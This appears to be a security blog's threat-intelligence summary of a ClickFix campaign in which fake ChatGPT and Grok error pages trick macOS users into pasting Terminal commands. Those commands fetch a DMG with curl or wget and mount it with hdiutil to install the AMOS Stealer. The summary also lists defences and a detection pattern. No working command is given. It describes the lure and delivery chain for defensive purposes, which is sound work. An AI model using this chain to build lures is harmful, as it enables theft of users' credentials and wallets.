Threat actors are deploying the AMOS Stealer on macOS by adapting the "ClickFix" social engineering technique. The attack leverages browser-based lures masquerading as AI tool errors (e.g., ChatGPT, Grok), prompting users to manually copy and execute a malicious command in the macOS Terminal. This sequence bypasses browser security and Gatekeeper by utilizing curl or wget to download a DMG file, which is then silently mounted via hdiutil. The primary objective is the exfiltration of browser passwords, session cookies, and cryptocurrency wallets.
-
Campaign Overview: The ClickFix Pivot
- Transition of ClickFix techniques from Windows to macOS environments to expand target reach.
- High-efficiency vectors leveraging psychological trust in AI platforms like ChatGPT and Grok.
- Strategic shift toward user-initiated execution to neutralize automated security blocks and browser warnings.
-
Attack Vector: Manual Command Execution
- Lures simulate technical glitches, instructing users to paste specific strings into zsh/bash.
- Execution chain: Browser Lure $\rightarrow$ Terminal Command $\rightarrow$ Remote Payload Download $\rightarrow$ DMG Mount.
- Use of the
hdiutilutility to silently mount the malicious image, bypassing traditional installer prompts.
-
Malware Profile: AMOS Stealer
- Specifically engineered macOS infostealer designed for stealthy data harvesting.
- Targeted exfiltration of browser-stored passwords, session cookies, and system metadata.
- Active targeting of local cryptocurrency wallet files and sensitive authentication tokens.
-
Defensive Actions & Mitigation
- Opera Browser implemented "Paste Protect" to disrupt the clipboard-to-terminal delivery pipeline.
- Defensive monitoring should focus on anomalous
curlorwgetrequests that triggerhdiutilmounts. - Requirement for enhanced user education regarding the extreme risk of executing untrusted Terminal commands.
-
Conclusion: Evolving Social Engineering
- Highlights a trend of bypassing OS-level protections (Gatekeeper) through direct human manipulation.
- Demonstrates the vulnerability of users who are comfortable with command-line interfaces.
- Necessitates a shift toward behavioral monitoring of system utilities over static signature detection.
Related posts
- techjacksolutions.com — SmartApeSG ClickFix Chain Delivers NetSupport RAT via Unidentified Dropper with Encoded C2 Traffic
- bleepingcomputer.com — Opera rolls out Paste Protect feature to fight ClickFix attacks
- News4Hackers — Opera Launches Paste Protect to Combat ClickFix Attacks
- Cybersecurity News — Opera Blocks Clipboard Attacks, Including ClickFix, With New Paste Protect Feature
- itpro.com — Opera browser thinks it has the solution to stopping ClickFix malware attacks
- Dark Reading — And the Winner in Dominant Malware Delivery? ClickFix
- Gurucul
- Securityboulevard
- Daily
- Malwarebytes
- Trendmicro
- Huntress
- Broadcom
- Huntress
- Cyberproof